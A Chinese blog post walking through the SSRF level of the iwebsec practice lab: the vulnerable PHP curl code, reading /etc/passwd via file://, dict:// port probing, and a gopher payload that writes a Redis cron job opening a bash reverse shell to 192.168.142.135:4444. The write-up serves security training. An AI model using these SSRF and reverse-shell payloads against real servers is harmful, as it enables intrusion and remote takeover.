iwebsec靶场(SSRF)

最新推荐文章于 2024-07-12 16:24:49 发布
最新推荐文章于 2024-07-12 16:24:49 发布
阅读量477 收藏 2
点赞数 1
分类专栏: iwebsec 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/129368629
版权
文章介绍了SSRF(服务器端请求伪造)漏洞,包括可能导致该漏洞的PHP函数如curl_exec和file_get_contents,以及CURL协议在SSRF中的应用,如file、dict和gopher协议。此外,文中还阐述了SSRF的危害,如扫描内网、获取敏感信息,以及如何利用SSRF进行内网服务攻击。提供了靶场地址供读者实践,并举例了WordPress和Discuz!的SSRF漏洞情况。
摘要由CSDN通过智能技术生成

iwebsec靶场(SSRF)

一、可能引起SSRF漏洞的PHP函数

函数作用
curl_exec()执行curl会话
file_get_contents()将整个文件读入一个字符串
fsockopen()打开一个网络连接或者一个Unix套接字连接

二、CURL其他协议

协议作用payload
file查看文件curl -v ‘file:///etc/passwd’
dict探测端口http://localhost/ssrf/ssrf1.php?url=dict://127.0.0.1:3306
gopher反弹shellcurl -v
‘gopher://127.0.0.1:6379/_3%0d%0a$3%0d%0aset%0d%0a$1%0d%
0a1%0d%0a$57%0d%0a%0a%0a%0a/1 * * * * bash -i >&
/dev/tcp/192.168.142.135/4444
0>&1%0a%0a%0a%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%
0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron
/%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a
$10%0d%0adbfilename%0d%0a 4 4%0d%0aroot%0d%0a*1%0d%0a 4
4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a’
  • dict协议:用于搭建在线字典服务
  • gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代

三、漏洞介绍

  • 服务器端请求伪造:是一种由攻击者构造形成由服务端发起请求的一个安全漏洞
  • 危害:
    • 扫描资产
    • 获取敏感信息
    • 攻击内网服务器(绕过防火墙)
    • 访问大文件,造成溢出
    • 通过Redis写入WebShell或建立反弹连接
  • 漏洞常见场景
    • 社会化分享功能
    • 转码服务
    • 在线翻译
    • 图片加载、下载功能
    • 图片、文章收藏功能
    • 网站采集、网站抓取
  • 实际案例
    • Wordpress 3.5.1以下版本 xmlrpc.phppingback的缺陷与SSFR
    • discuz!的SSRF(利用php的header函数来绕过,其实就是302跳转实现协议转换)
    • weblogic的SSRF

四、靶场地址:http://iwebsec.com/

五、SSRF服务端请求伪造

1.查看源码
<?php require_once '../header.php'; ?>
<html>
	<head>
		<title>SSRF服务端请求伪造</title>
	</head>
	<h2>SSRF服务端请求伪造</h2>
		<div class="alert alert-success">
			<p>/index.php?url=http://127.0.0.1/vuln/ssrf/1.txt </p>
		</div>
	<body>


<table class='table table-striped'>

<?php  
	if (isset($_GET['url'])) { 
		$link = $_GET['url']; 
		$filename = './curled/'.rand().'txt'; 
		$curlobj = curl_init($link); 
		$fp = fopen($filename,"w"); 
		curl_setopt($curlobj, CURLOPT_FILE, $fp); 
		curl_setopt($curlobj, CURLOPT_HEADER, 0); 
		curl_exec($curlobj); 
		curl_close($curlobj); 
		fclose($fp); 
		$fp = fopen($filename,"r"); 
		$result = fread($fp, filesize($filename));  
		fclose($fp); 
		echo $result; 
	} 
?> 

</table>

PHP中的fopen函数用于打开一个文件或URL;fclose () 函数关闭该指针指向的文
curl_setopt函数的作用是为一个CURL会话设置选项
curl_exec函数是PHP cURL函数列表中的一种,它的功能是执行一个cURL会话
2.访问系统文件

  • 查看网站自带的1.txt

    /ssrf/index.php?url=http://127.0.0.1/ssrf/1.txt

    请添加图片描述

    请添加图片描述

  • 查看passwd文件

    /ssrf/index.php?url=file:///etc/passwd

    请添加图片描述

六、SSRF内网探测漏洞

  • 利用SSRF端口探测方法,如果访问3306端口返回数据库信息,就说明开启了3306端口。反之如果无数据返回或者延迟较大,说明该端口未开放。

    /ssrf/index.php?url=dict://127.0.0.1:3306

    请添加图片描述

七、SSRF内网应用攻击

  • 访问内网http服务

    /ssrf/index.php?url=http://127.0.0.1

    请添加图片描述

果粒程1122
关注
专栏目录
SSRF漏洞靶场
WINDY_PACE的博客
05-15 2811
对于SSRF,回显是能够成功利⽤的重要条件,所以过滤返回信息,验证远程服务器对请求的响应是⽐较容易的⽅法。如果WEB应⽤ 是去获取某⼀种类型的⽂件,那么在把返回结果展⽰给⽤户之前先验证返回的信息是否符合标准。 禁⽤不需要的协议,仅仅允许HTTP和HTTPS请求。可以防⽌类似于file://、gopher://、ftp://等引起的问题
Burp suite靶场SSRF练习(1)-持续更新中
最新发布
09-09
手把手带你做Burp suite靶场SSRF练习
iwebsec靶场(sql注入)
果粒程
02-24 1129
iwebsec靶场(sql注入)
iwebsec靶场通关sql注入详解
m0_51090949的博客
07-12 1215
iwebsec靶场,sql注入通关,详细教程。
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场
网络安全领域___专研者.
04-24 3167
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
iwebsec靶场搭建
mooyuan的博客
11-25 4880
iwebsec靶场可以通过两种方法进行渗透。第二种是本地搭建:目前可以通过两种方法搭建,一种是虚拟机绿色版解压即用,另外一种则是通过docker安装。
iwebsec靶场(文件上传)
果粒程
02-26 1574
iwebsec靶场(文件上传)
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
pikachu靶场ssrf
08-07
对于Pikachu靶场SSRF,我了解到Pikachu是一个开源的靶场平台,用于测试和学习网络安全方面的知识和技能。SSRF(Server Side Request Forgery)是一种攻击技术,攻击者可以利用漏洞发送伪造的请求,从而访问应用程序...
iwebsec靶场(XXE漏洞)
果粒程
03-07 871
iwebsec靶场(XXE漏洞)
iwebsec靶场 中间件漏洞通关笔记1-Weblogic中间件漏洞
mooyuan的博客
04-21 1544
通过实战iwebsec靶场Weblogic SSRF中间件漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
iwebsec靶场(命令执行)
果粒程
03-03 502
iwebsec靶场(命令执行)
iwebsec靶场(文件包含)
果粒程
03-02 1247
iwebsec靶场(文件包含)
iwebsec靶场 SSRF关卡通关笔记
mooyuan的博客
11-03 1389
iwebsec靶场SSRF漏洞通关笔记。
iwebsec靶场 中间件漏洞通关笔记3-Jboss中间件漏洞
mooyuan的博客
04-21 1274
JBoss是一套开源的企业级Java中间件系统,用于实现基于SOA的企业应用和服务,基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
iwebsec靶场环境搭建
dahege666的博客
03-24 1033
iwebsec靶场搭建
iwebsec靶场 反序列化关卡通关笔记1
mooyuan的博客
11-04 1240
iwebsec靶场反序列漏洞通关笔记。
iwebsec靶场SQL注入-宽字节注入
qq_56041380的博客
03-28 617
开发者为了防止出现SQL注入攻击,将用户输入的数据用addslashes等函数进行过滤。addslashes等函数默认对单引号等字符进行转义,这样就可以避免注入。宽字节注入产生的原因是MYSQL在使用GBK编码的时候如果第一个字符的ASCII码大于128,会认为前面两个字符是汉字,会将前两个字符拼接为汉字,这样就可以将SQL语句闭合,造成宽字节注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值